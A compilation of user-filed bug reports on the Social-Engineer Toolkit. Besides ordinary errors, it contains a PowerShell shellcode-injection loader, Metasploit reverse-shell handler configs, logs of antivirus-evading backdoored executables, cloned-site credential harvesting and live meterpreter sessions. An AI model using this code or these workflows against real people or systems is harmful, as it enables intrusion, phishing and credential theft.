I have had multiple instances of infectious media generation fail on me today within SET 5.3.2.
As an example, this is the most recent circumstance through which I experienced a failure.
Menu Options Followed:
1, 3, 1, 5, 7
I was attempting to generate an Adobe Flash Player "Button" Remote Code Execution exploit with a Windows Meterpreter Reverse HTTPS payload.
Upon completion of the file generation, I received the following message.
[-] Generating fileformat exploit...
[] Payload creation complete.
[] All payloads get sent to the /root/.set/template.pdf directory

It looks as though it is attempting to place the file out in the /root/.set/ directory, but in this situation it is trying to write that data into template.pdf.
I have looked around for the payload to be in other possible locations, but was unable to find the 'generated' media.
This issue has taken place for multiple different kinds of exploits today, however, most of which are reverse meterpreter https payloads though.

Thanks,
@c0ncealed

not working in window 7

Hi guys,

This is not a huge deal, and you guys might not even care, but I just wanted to bring to your attention that white space is not currently being stripped at the user prompt in setoolkit 5.3.2.

Many distros are using simpler MTA by default such as ssmtp. It provides "sendmail" compatible binary and all features including spoofing.

At Pentoo, we have to patch that section design for a specific linux using the following patch:
https://code.google.com/p/pentoo/source/browse/portage/trunk/net-analyzer/set/files/set-5.3.4-ssmtp.patch

Please ask user to start sendmail if required and just check for "sendmail" presence.

First I thought I messed up the config file , but then I did 3 fresh installs and problem persists ; (v 5.4.7)

(2) Website Attack Vectors
(1) Java Applet Attack Method
(2) Site Cloner
(2) Windows Reverse_TCP Meterpreter
(4) Backdoored Executable

It seems that SET confuses the lines on .set/meta_config ;
(Tried to disable EnableStageEncoding=OFF , but same results)

Only the last try handler gets the correct values to the correct topic.

et:payloads> PORT of the listener [443]:
[] Generating x86-based powershell injection code for port: 22
[] Generating x86-based powershell injection code for port: 53
[] Generating x86-based powershell injection code for port: 443
[] Generating x86-based powershell injection code for port: 21
[] Generating x86-based powershell injection code for port: 25
[] Finished generating powershell injection bypass.
[] Encoded to bypass execution restriction policy...
[-] Backdooring a legit executable to bypass Anti-Virus. Wait a few seconds...
[] Backdoor completed successfully. Payload is now hidden within a legit executable.

Web Server Launched. Welcome to the SET Web Attack.

[--] Tested on Windows, Linux, and OSX [--]
[] Moving payload into cloned website.
[] The site has been moved. SET Web Server is now listening..
[-] Launching MSF Listener...
[-] This may take a few to load MSF...

MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM MMMMMMMMMM
MMMN$ vMMMM
MMMNl MMMMM MMMMM JMMMM
MMMNl MMMMMMMN NMMMMMMM JMMMM
MMMNl MMMMMMMMMNmmmNMMMMMMMMM JMMMM
MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM
MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM
MMMNI MMMMM MMMMMMM MMMMM jMMMM
MMMNI MMMMM MMMMMMM MMMMM jMMMM
MMMNI MMMNM MMMMMMM MMMMM jMMMM
MMMNI WMMMM MMMMMMM MMMM# JMMMM
MMMMR ?MMNM MMMMM .dMMMM
MMMMNm ?MMM MMMM dMMMMM
MMMMMMN ?MM MM? NMMMMMN
MMMMMMMMNe JMMMMMNMMM
MMMMMMMMMMNm, eMMMMMNMMNMM
MMMMNNMNMMMMMNx MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM
http://metasploit.pro

   =[ metasploit v4.9.0-dev [core:4.9 api:1.0] ]

• -- --=[ 1264 exploits - 694 auxiliary - 202 post ]
• -- --=[ 331 payloads - 33 encoders - 8 nops ]

[] Processing /root/.set/meta_config for ERB directives.
resource (/root/.set/meta_config)> use exploit/multi/handler
resource (/root/.set/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/root/.set/meta_config)> set LHOST 192.168.2.2
LHOST => 192.168.2.2
resource (/root/.set/meta_config)> set EnableStageEncoding 22
EnableStageEncoding => 22
resource (/root/.set/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (/root/.set/meta_config)> set LPORT false
LPORT => false
resource (/root/.set/meta_config)> exploit -j
[-] Exploit failed: The following options failed to validate: LPORT, EnableStageEncoding.
resource (/root/.set/meta_config)> use exploit/multi/handler
resource (/root/.set/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/root/.set/meta_config)> set LHOST 192.168.2.2
LHOST => 192.168.2.2
resource (/root/.set/meta_config)> set EnableStageEncoding 53
EnableStageEncoding => 53
resource (/root/.set/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (/root/.set/meta_config)> set LPORT false
LPORT => false
resource (/root/.set/meta_config)> exploit -j
[-] Exploit failed: The following options failed to validate: LPORT, EnableStageEncoding.
resource (/root/.set/meta_config)> use exploit/multi/handler
resource (/root/.set/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/root/.set/meta_config)> set LHOST 192.168.2.2
LHOST => 192.168.2.2
resource (/root/.set/meta_config)> set EnableStageEncoding 443
EnableStageEncoding => 443
resource (/root/.set/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (/root/.set/meta_config)> set LPORT false
LPORT => false
resource (/root/.set/meta_config)> exploit -j
[-] Exploit failed: The following options failed to validate: LPORT, EnableStageEncoding.
resource (/root/.set/meta_config)> use exploit/multi/handler
resource (/root/.set/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/root/.set/meta_config)> set LHOST 192.168.2.2
LHOST => 192.168.2.2
resource (/root/.set/meta_config)> set EnableStageEncoding 21
EnableStageEncoding => 21
resource (/root/.set/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (/root/.set/meta_config)> set LPORT false
LPORT => false
resource (/root/.set/meta_config)> exploit -j
[-] Exploit failed: The following options failed to validate: LPORT, EnableStageEncoding.
resource (/root/.set/meta_config)> use exploit/multi/handler
resource (/root/.set/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/root/.set/meta_config)> set LHOST 192.168.2.2
LHOST => 192.168.2.2
resource (/root/.set/meta_config)> set EnableStageEncoding 25
EnableStageEncoding => 25
resource (/root/.set/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (/root/.set/meta_config)> set LPORT false
LPORT => false
resource (/root/.set/meta_config)> exploit -j
[-] Exploit failed: The following options failed to validate: LPORT, EnableStageEncoding.
resource (/root/.set/meta_config)> use exploit/multi/handler
resource (/root/.set/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/root/.set/meta_config)> set LHOST 192.168.2.2
LHOST => 192.168.2.2
resource (/root/.set/meta_config)> set LPORT 443
LPORT => 443
resource (/root/.set/meta_config)> set EnableStageEncoding false
EnableStageEncoding => false
resource (/root/.set/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (/root/.set/meta_config)> exploit -j
[] Exploit running as background job.
msf exploit(handler) >

I made a java applet attack and chose "Import your own executable". After opening the link (ip address) the applet pops up and then nothing happens after "run".

Following error is showing up: GET /asdfeaala/404. So this file can't be found in the webserver folder.

In the webserver folder is the "signed_update.jar" and a "wefwfa" file.

In the html code of the clonend website are three of the "werafia" files mentionend. The first one wefwfa can be found but the second one not any more ->asdfeaala

I'm using the latest set version

Running SET 5.1 in Kali Linux on 64-bit. Trying to generate a python payload (using option 1, option 4, option 15). SET will create the meterpreter.alpha file in the root of SET but no executable is created, though states that msf.exe has been created in the root of SET.

Looking at the wrong location, disregard. Apologies!

It looks like Java 8 doesn't like anything but signed and trusted applets by default now. Just tested it and it denied the self-signed applet with the "factory-shipped" settings. Any bypass/workaround available (or in the works)?

About SMS Spoofing.

sms_launch.py i update the new lines for 5.4.8 and now i get the templates, and have couple questions.

1. SohoOS (buggy) What is it? and i get "Error while sending SMS" (every-time)
   It could be from my end, not sure. It would be very cool to be more verbose.
2. Android Emulator (need to install Android Emulator) do i have to edit any files for it to work.

Thanks, Syther21

I'm using newest SET 5.4.7 and have had this problem for a long time but got out of linux for months and now back in it and even after so many updates its still there, and just wanted to inform you. I have never try this ever, and would be very interested in experimenting with it on my phone.
I'm running Kali Linux

heres what i did when i opened setoolkit

1. social-enginieerinig attacks
2. SMS spoofing attack vector
3. perform a SMS spoofing attack

1. SMS attack singe number

single SMS attack
set:sms> send sms too: 7249880000

1. pre-defined Template

set:sms> use a predefined template or craft a one time SMS?:1

[!] Something went wrong, printing the error: global name 'setdir' is not defined

This is not so much a bug report/issue as it is an explanation of a comment in the code.
https://github.com/trustedsec/social-engineer-toolkit/blob/27cc394/src/core/setcore.py#L1253-L1270

I believe this is not a bug in Python, but a result of different unicode encodings. It appears Python defaults to UTF-8 whereas Windows is expecting UTF-16 (Little Endian). The following Python code should accomplish the same thing as the loop that inserts the null bytes.

powershell_command.encode('utf_16_le')

and the whole thing could be condensed to:

# powershell command here, needs to be unicoded then base64 in order to use encodedcommand
powershell_command = ('''$code = '[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);';$winFunc = Add-Type -memberDefinition $code -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$sc64 = %s;[Byte[]]$sc = $sc64;$size = 0x1000;if ($sc.Length -gt 0x1000) {$size = $sc.Length};$x=$winFunc::VirtualAlloc(0,0x1000,$size,0x40);for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};$winFunc::CreateThread(0,0,$x,0,0,0);for (;;) { Start-sleep 60 };''' % (shellcode))

return base64.b64encode(powershell_command.encode('utf_16_le'))

Hello there,

I was trying to execute the following command.
git clone https://github.com/trustedsec/social-engineer-toolkit/ set/
But after 45% it failed and show an error.
error: RPC failed; result=18, HTTP code = 200iB
I have also tried to download .zip version but it also failed after download 2MBs.
Is there any solution for this problem?

When I try and run the teensy powershell injection attack I get the following error message and SET crashes

[] Generating x86-based powershell injection code for port: 22
[] Generating x86-based powershell injection code for port: 53
[] Generating x86-based powershell injection code for port: 443
[] Generating x86-based powershell injection code for port: 21
[] Generating x86-based powershell injection code for port: 25
[] Finished generating powershell injection bypass.
[*] Encoded to bypass execution restriction policy...

[!] Something went wrong, printing the error: name 'path' is not defined

I have tried running SET as both sudo -E ./setoolkit, sudo ./setoolkit and sudo -E /usr/bin/setoolkit and sudo /usr/bin/setoolkit and I still get the path not defined error in Kali Linux with a up to date version of SET.

I am using a VPN to port forward (since I have issues using just my router). I am port forwarding 4444, 4445, and 1604. I set the port for the webserver in SET_config to 4445. I launch the Java applet attack and complete everything, setting the listeners at 4444 and 1604. However, when I try to go to the IP on port 4445, it doesn't work like it should. Yet when I go to ports 4444 or 1604, there is a response saying "sending stage" (though obviously I didn't run the applet since the web server was down). Canyouseeme.org say my ports are open, so I don't think that is an issue.I am running Kali with the latest version of SET. Thanks. Everything is documented here:

http://pastebin.com/SNMtRLXx

Hey Dave,

I am taking a look at doing some refactor to setup.py by using platform.dist() so you can then tell if you are on ubuntu as it will output thisplatform.dist()[0] Out[13]: 'Ubuntu' and there is a dedicated function for windows and mac but i am only going to be looking at linux stuff. just wondering all the files I would need to take a look at, please bear with me am new ish to python. I can also add support for other linux distros that you do not currently support but not sure which ones.

After downloading the latest SET update, running into the following when starting - note this is running on the Pwn Pad:

root@56e514396ab6:/opt/pwnpad/set# ./set
[-] New set_config.py file generated on: 2013-03-24 16:44:10.522442
[-] Verifying configuration update...
[*] Update verified, config timestamp is: 2013-03-24 16:44:10.522442
[*] SET is using the new config, no need to restart
Traceback (most recent call last):
File "./set", line 46, in 
start_dns()
File "/opt/pwnpad/set/src/core/setcore.py", line 1456, in start_dns
if dns_check.lower() == "on":
AttributeError: 'NoneType' object has no attribute 'lower'

...

Would it be possible to not capture the password, but just the username when running the credential harvester? Up to this point I have been able to modify the python script to accomplish this, but would rather it be an option in the config. That way the python script doesn't need to be modified upon new releases.

ihiohoi

OSX can't handle a directory and a file named the same thing, even with different case. I don't understand why but that's what it does.

So trying edit or submit edits on Github and annoying as you'll have to delete one to solve the issue

Suggestion to rename the README file to README.md or txt

1. SMS Spoofing Attack Vector : when the body of the SMS is just one line, SET can't process it
2. Credential Harvester Attack Method & Tabnabbing Attack Method : don't generate report?? And still have bug when typing IP the server will POST

I tried using Get-PassHashes in Nishang's powershell library and this appeared to give corrupted hashes when LM hashes are disabled. As this is based on your work I tried the Powerdump in SET and this appears to also have the same corruption.

The issue is well documented http://blog.spiderlabs.com/2012/08/stamping-out-hash-corruption.html

Would be cool if you could also send the updated file upstream to Metasploit too!

http://pastie.org/private/zjb6clibmlylhqva0hhg (examples uses nishangs script based on powerdump)

It's called se-toolkit currently, but the tool is known as "set".
That means if somebody would type set[tab] in the cli he wouldn't able to find all set binaries.

The same goes for gui menu. KDE menu doesn't even search by two characters ("se").

I propose to call it "setoolkit"

Thank you.

I have metasploit installed and working built manually from the rapid7 git repository.

When I point METASPLOIT_PATH at the path of the installed metasploit directory (with no trailing slash) I get the following error:

[!] Metasploit path not found. These payloads will be disabled.
[!] Please configure in the config/set_config.

Is a manual metasploit running from git supported?

I was troubleshooting a campaign I was doing, and found an issue with the creation of the 'meta_config' file used to run metasploit.

I am running behind NAT, so my actual IP isn't my public IP, which doesn't seem to affect this, but will affect the fix.

My 'meta_config' file was generated as follows:

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
 set LHOST 0.0.0.0
set ExitOnSession false
set LPORT 22
exploit -j


use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
 set LHOST 0.0.0.0
set ExitOnSession false
set LPORT 53
exploit -j


use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
 set LHOST 0.0.0.0
set ExitOnSession false
set LPORT 443
exploit -j


use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
 set LHOST 0.0.0.0
set ExitOnSession false
set LPORT 21
exploit -j


use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
 set LHOST 0.0.0.0
set ExitOnSession false
set LPORT 25
exploit -j


use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
 set LHOST 0.0.0.0
set ExitOnSession false
set LPORT 8080
exploit -j

Notice the LHOST is set to '0.0.0.0'. This apparently does not work. I read on a mailing list, that setting the LHOST properly would fix it, and then later in the thread, it said the code had been fixed around it, but it doesn't apparently work now.

I changed my resource file to have my actual IP. I could get the meterpreter sesions, but whenever I tried to interact with them, I saw:

MSF (s:4 j:5) exploit(handler) > sessions -i 4
[*] Starting interaction with 4...

meterpreter > ls
[-] Unknown command: ls.
meterpreter > help
meterpreter > help
meterpreter > sysinfo
[-] Unknown command: sysinfo.
meterpreter > dir
[-] Unknown command: dir.
meterpreter > background
MSF (s:4 j:5) exploit(handler) > sessions

Active sessions
===============

  Id  Type                   Information  Connection
  --  ----                   -----------  ----------
  1   meterpreter x86/win32               192.168.11.33:443 -> x.x.x.x:53634 (x.x.x.x)
  2   meterpreter x86/win32               192.168.11.33:53 -> x.x.x.x:53636 (x.x.x.x)
  3   meterpreter x86/win32               192.168.11.33:8080 -> x.x.x.x:53637 (x.x.x.x)
  4   meterpreter x86/win32               192.168.11.33:443 -> x.x.x.x:53635 (x.x.x.x)

MSF (s:4 j:5) exploit(handler) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > sysinfo
[-] Unknown command: sysinfo.
meterpreter > help
meterpreter > [-] Failed to load extension: No response was received to the core_loadlib request.
[-] Failed to load extension: No response was received to the core_loadlib request.
[-] Failed to load extension: No response was received to the core_loadlib request.


meterpreter > 

Once I finally changed the 'meta_config' file to use my NAT external IP, instead of '0.0.0.0', it worked:

MSF (s:4 j:5) exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > ls

Listing: C:\Documents and Settings\Administrator\Desktop
========================================================

Mode             Size  Type  Last modified              Name
----             ----  ----  -------------              ----
40777/rwxrwxrwx  0     dir   2012-02-14 07:46:32 -0500  .
40777/rwxrwxrwx  0     dir   2012-02-16 09:24:34 -0500  ..

meterpreter > sysinfo
Computer        : USER-6D07D5DAB0
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > 
Background session 1? [y/N]  
MSF (s:4 j:5) exploit(handler) > sessions -i 4
[*] Starting interaction with 4...

meterpreter > ls

Listing: C:\Documents and Settings\Administrator\Desktop
========================================================

Mode             Size  Type  Last modified              Name
----             ----  ----  -------------              ----
40777/rwxrwxrwx  0     dir   2012-02-14 07:46:32 -0500  .
40777/rwxrwxrwx  0     dir   2012-02-16 09:24:34 -0500  ..

meterpreter > 

Edit: Seems like I was mistaken, regarding the following. The problem was not w/ netstat in this case, but was with a version of Pow I was running locally. The netstat command is throwing errors on OS X, though.

It appears that the command which is checking whether a process is active on the port is returning false positives on Mac OS X -- not, haven't tried on other platforms. For example, I have a process that is listening on port 4380 and as such, the following netstat command is returning a false positive:

netstat -a |grep LISTEN |grep '80'
tcp4       0      0  localhost.4380         *.*                    LISTEN 

Furthermore, looks like netstat -antp is also broken on Mac OS X, as seen below.

If I have time later I'll fix and submit pull-req.

Edit: This may help too
Darwin HOSTNAME 12.4.0 Darwin Kernel Version 12.4.0: Wed May 1 17:57:12 PDT 2013; root:xnu-2050.24.15~1/RELEASE_X86_64 x86_64

set:payloads> Port to use for the reverse [443]:900

[*] Cloning the website: http://REDACTED
[*] This could take a little bit...
[*] Injecting iframes into cloned website for MSF Attack....
[*] Malicious iframe injection successful...crafting payload.

[!] ERROR:Something is running on port 80. Seeing if it's a stale SET process...
netstat: option requires an argument -- p
Usage:  netstat [-AaLlnW] [-f address_family | -p protocol]
    netstat [-gilns] [-f address_family]
    netstat -i | -I interface [-w wait] [-abdgRt]
    netstat -s [-s] [-f address_family | -p protocol] [-w wait]
    netstat -i | -I interface -s [-f address_family | -p protocol]
    netstat -m [-m]
    netstat -r [-Aaln] [-f address_family]
    netstat -rs [-s]

[!] If you want to use Apache, edit the config/set_config
[!] Exit whatever is listening and restart SET

Don't know if I'm doing something wrong, but with the latest version of SET from the repositories running in an up to date Kali, if I configure the option "POWERSHELL_INJECTION" to "OFF" and then try to make a Java Applet attack with a "Windows Meterpreter Reverse HTTPS" payload, the "LHOST" option is not set:

[*] Processing /root/.set/meta_config for ERB directives.
resource (/root/.set/meta_config)> use exploit/multi/handler
resource (/root/.set/meta_config)> set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
resource (/root/.set/meta_config)> set LHOST
[-] Unknown variable
Usage: set [option] [value]

As I can confirm in the file "~/.set/meta_config":

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST
set EnableStageEncoding true
set ExitOnSession false
set LPORT 22
exploit -j

Everything works as expected if I turn the "POWERSHELL_INJECTION" on.

I see some references to src/core/set.py to delete MLITM but the code is still there. Also the documentation for it still exists in the web attack menu. Is this feature getting phased out or is this a bug? It looks like this was last supported in b0b78b6. Are there plans to re-integrate this feature?

Hi,

I have been working with set-automate a lot on a ubuntu 12.04 LTS 32bit server and I ran into the issue when using set-automate it exits after the following:

/usr/share/setoolkit$ sudo ./set-automate auto.txt
[] Spawning SET in a threaded process...
[] Sending command 1 to the interface...
[] Sending command 2 to the interface...
[] Sending command 3 to the interface...
[] Sending command 2 to the interface...
[] Sending command 1.1.1.1 to the interface...
[] Sending command http://gmail.com to the interface...
[] Finished sending commands, interacting with the interface..

looking at the code on line 57 there is a child process spawned for 'set' but there is not 'set' executable file anymore within SET it has been replaced by se-toolkit if installing from git. Therefore no child process is spawned and set-automate exits. I did some testing and set-automate works if line 57 is changed to 'child=pexpect.spawn("python se-toolkit")'. This is a non-issue in Kali Linux since there is a 'set' executable file within the SET installation directory.

Thanks!

-bl

I'm trying perform the Harvester/Tabnabbing methods from SET outside my local network. So since my ISP blocks the port 80 I changed the parameter WEB_PORT on set_config to another port (e.g 3505). After that I executed the Harvester/Tabnabbing and sent my external IP with the port to a friend, the site loaded normally on his PC and I got the hits on my terminal. However, when my friend clicks on button to send the data I have not received answer and the site on his browser gave fault to loading the page. Seems the cloned site try to answer in port 80 and not on the same port that I had changed. So, Is there any way that I can fix it? Thank you.

SET is meant to redirect to the original page, after the user makes a login attempt on the cloned one. There is a small error that is preventing it from doing so. It is missing the ":" in "http://".

For example, if I clone https://facebook.com the user is redirected to https//facebook.com and the browser cannot understand the address.

First of all, when I try this option, the configuration page doesn't open, it just repons se-toolkit

6) Update SET configuration

I have setup Java applet over the net. when I send it to my friend, I have to put the port number after my ex.ip for ex. 123.123.123.123:444(open port). The clone page doesn't load on my friends computer and it just keeps loading very slow.. I, however do get a response from him .

Encoded stage with x86/shikata_ga_nai

[*] Sending encoded stage (751134 bytes) to 174.0.152.xx

so I am assuming that because the java applet doesn't load on their side to click on, I can't get a shell opened.

help please?

thank you.

trustedsec commented 2 days ago Owner

The SMS stuff uses some pay services except the android emulator - for actual attacks, would recommend using something like site cloner with cred harvester - since iPhone/Android wouldn't be vulnerable to java applet attack, you would want to use that or possibly a metasploit exploit.
trustedsec trustedsec closed the issue 2 days ago

slyther21 commented a minute ago

well, i understand that to a point. but i believe my "OPINION" only mine, and not to offend you.
Out of all the other programs on SETOOLKIT, SMS-Spoofing feels like it was just thrown in there and and doesn't get any attention. i feel like it skipped a BIG step in development, and i would like to help the best i can to back-step it and make it 100x better than what it is, since it don't even work anyhow without paying. That just described it. we need to build a SMS-Gateway. i have lots of ideas and improvements if your interested. If you just comment and let me know i already have the cellphone email code list,. and info on what to do just have no programming skills yet.

1-8-1 needs to be redone, as dhcp3 has changed the config structure and is now managed in services.

Source: http://askubuntu.com/questions/152834/i-try-install-dhcp3-server-but-etc-init-d-dhcp3-server-file-is-missing-whats (not me, but I had the same problem)
src/wireless/wifiattack.py

and some code stil have the "set-automate" and not the new "seautomate", had some problems with that one to.

Nice pentest toolkit :)

Hi Dave,

I recently came across this issue when testing out the self signing capabilities with the new version of Java just released. I received the following error and it tries to move the self signed applet to the 'program_junk' directory. However, this directory does not seem to exist anymore ;)

The signer certificate will expire within six months.
[*] Java Applet is now signed and will be imported into the website
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:mv: cannot move Signed_Update.jar' to../../program_junk/': Not a directory

After a looking through the code a bit I see that on line 44 of the /usr/share/set/src/html/unsigned/self_sign.py file the self sign module attempts to move the new self signed applet into the program_junk folder.

Current line 44:

subprocess.Popen("mv Signed_Update.jar ../../program_junk/", shell=True)

After a bit of testing, I fixed this issue by editing like 44 in the /usr/share/set/src/html/unsigned/self_sign.py file to the following, so the module will move the self signed applet into the '~/.set/' directory.

Modified Line 44:

subprocess.Popen("mv Signed_Update.jar ~/set/", shell=True)

This works for me and I see the custom self signed certificate when prompted to run the java applet.

So much self signing in this issue wow :) Oh and I know getting a code signing cert is the way to go :)

Thanks!

Hi,

I'm trying to use this option in order to test the security of my computers but I cannot get this option to work, all I have is this message :

set:arduino>12
[*] Generating the Powershell - Shellcode injection pde..

The powershell - shellcode injection leverages powershell to send a meterpreter session straight into memory without ever touching disk.

This technique was introduced by Matthew Graeber (http://www.exploit-monday.com/2011/10/exploiting-powershells-features-not.html)

[!] Something went wrong, printing the error: name 'setdir' is not defined

I've googled this a little bit and I can't find a solution, this problem wasn't here in the previous versions of SET.

Is this comming from me ? I'm running Kali Linux 1.0.5 and everything is up to date.

Hello,

Because there is no reports folder in the main set folder, generating Binary 2 Teensy Attack (Deploy MSF payloads) attempt failed with the error as shown below. (Tested on Kali VM)

[!] Something went wrong, printing the error: [Errno 2] No such file or directory: 'reports/binary2teensy.pde'

Regards,

I'm using SET with Kali and I get this error when I enable ettercap in the config file. The path is set to /usr/share/ettercap, so I'm not sure where the local part is coming from.

set> Site to redirect to attack machine [*]: *
[!] ERROR:An error has occured:
ERROR:[Errno 2] No such file or directory: '/usr/local/share/ettercap'

Hey,

Been working on getting the credential harvester setup on 443 today and have been getting some strange errors. I can go through the paces of getting the self signed cert created and the credential harvester will say it is running on 443, but as soon as the first request comes in, I get the following error message (IP address scrubbed):

Enter PEM pass phrase:
----------------------------------------
Exception happened during processing of request from ('XXX.XXX.XXX.XXX', 51516)
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 284, in _handle_request_noblock
    self.process_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 310, in process_request
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 323, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/SocketServer.py", line 638, in __init__
    self.handle()
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 340, in handle
    self.handle_one_request()
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 310, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python2.7/socket.py", line 476, in readline
    data = self._sock.recv(self._rbufsize)
Error: [('SSL routines', 'SSL23_GET_CLIENT_HELLO', 'http request')]
----------------------------------------

The only values changed in the set_config file are:

WEBATTACK_SSL=ON
SELF_SIGNED_CERT=ON

My set-automate file looks like this (scrubbed).:

1
1
2
3
2
my.exter.nal.ip
https://siteimcloning.com/

Then I enter the data for the cert creation manually.

Any help would be appreciated!

when i tried to create a payload it gave me this error

1. Social-Engineering Attacks
   4) Create a Payload and Listener

set> 4

[!] Something went wrong, printing the error: name 'src' is not defined

logs
ERROR: 2013-10-29 11:23:52.252237: name 'src' is not defined
ERROR: 2013-10-29 11:16:26.175999: name 'src' is not defined

I run the Java applet attack and after everything is set up the web browser (chrome) tries to download a d file called "download" rather than run the website. (IE) just shows a bunch of random characters. I just updated Java on the test machine as of 4/27/2013

When you are doing a social engineering attack of spear phishing with a pdf, if you don't specify the file path 2 times it quits set. I think it would be better to kick you back to the main menu.

Here is the whole error message:

Traceback (most recent call last):
File "/usr/bin/setoolkit", line 27, in
from src.core.setcore import *
ImportError: No module named src.core.setcore

Anyone know a fix thanks

Currently the module for teensy powershell code injection has windows/meterpreter/reverse_tcp hard coded as the only payload it can use. Wouldn't it be more useful to select different meterpreter payloads for this module at run time?

There seems to be a bug with changing the powershell payload to reverse_https when generating a Java applet. I pulled the most recent version down on 3 different machines (Kali, Debian 7, and Ubuntu 12.04) and replicated the issue. The error generated is as follows:
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 0 compatible encoders

[!] Something went wrong, printing the error: 'ascii' codec can't decode byte 0xfc in position 554: ordinal not in range(128)

If the reverse_tcp payload is used in the config file the applet and payload is generated properly.

Please let me know if I can be of any further assistance in troubleshooting this issue.

Hello,

I believe I'm running into some bugs in 5.4.2 with the smtp_web.py module.
User tracking is set to ON.

Test case is as follows:

1. Social-Engineering Attacks
2. Website Attack Vectors
3. Credential Harvester Attack Method
4. Site Cloner

Specify my IP and an example site www.google.com,

1. E-Mail Attack Single Email Address
   Enter in email,
2. Use your own server or open relay. No auth.

Running Sendmail=1.

Open relay option specifies:
Specify Open-Relay Option Here
if relay == '2':
user1 = raw_input(setprompt(["1"], "From address (ex: [email protected])"))
from_address = raw_input(setprompt(["1"], "The FROM NAME the user will see"))
if sendmail==0:
user = raw_input(setprompt(["1"], "Username for open-relay [blank]"))
pwd = getpass.getpass("Password for open-relay [blank]: ")

However user1 isnt used, if sendmail==1 the function is called line this on line 268

if sendmail == 1:
mailServer.sendmail,(user, to, msg.as_string())

As a result this will die:
Dec 13 16:59:06 kali sm-mta[22741]: rBDLx6Fi022741: localhost [127.0.0.1] did not issue MAIL/EXPN/VRFY/ETRN during connection to MTA-v4

Hey guys,

I started refactoring the command_center.py class file, because I found(using clone_digger ) that the most duplication of code that we have here, lives in that file.

Once I started doing some refactoring, I saw that it's a bigger problem then I thought: the project lacks some knowledge of python style and rules(some simple things like starting class names with uppercase, basic OO and right scoping of thins like variables and methods).

Another thing that I've noticed, is that a lot of variables were named like: foo1, foo2, foo3. This makes a lot harder for somebody that is trying to understand the code.

I have a few suggestions that I think might help:

• every single code that will make the way to the master branch, need to pass for some kind of code review(even you @trustedsec :) ). That way we have a better chance to grow the codebase without creating a even bigger monster. I volunteer to do this.
• start to improve classes one by one. Example: if someone will make a change or bugfix in the command_center.py, that person should try improve the class or method that is surrounding the one he is changing. That way, we will start to slowly see some improvements
• keep an eye on clone_digger for code duplication

Just to be clear, I'm here to help and I really want to make this project's code better(like I tried to do in artillery here ) and not just to criticize. This project is awesome and just need some love(and hugs).

Hi,
Been doing test with SET and the Java Applet Attack Method, but when visiting the cloned page, the Applet wouldn't load, even though I could see the applet code in the page source. I tested with Firefox, Chrome and IE with no luck.

After doing some research with the code of Webs that loaded Java Applets OK, I realised that it could be related to the order of the parameters in the applet code template; the file "src/webattack/web_clone/applet.database" looks like this:
<applet width="1" height="1" id="IDREPLACEHERE" code="Java.class" archive="Signed_Update.jar">
So I moved the "code" parameter to the first position:
<applet code="Java.class" width="1" height="1" id="IDREPLACEHERE" archive="Signed_Update.jar">
And know the applet shows up when loading the cloned pages! Could you fix it?

Thank you!

First thanks to the SET team for all the great work, tons and tons of features.
I have tested this on a brand new Ubuntu Rackspace box and a fresh install of KALI with the same results so I suspect it's code related.

When creating a payload and listener for the SE interactive shell the listener start-up errors out. You can replicate the error by trying to start the listener from the payloads directory as well.

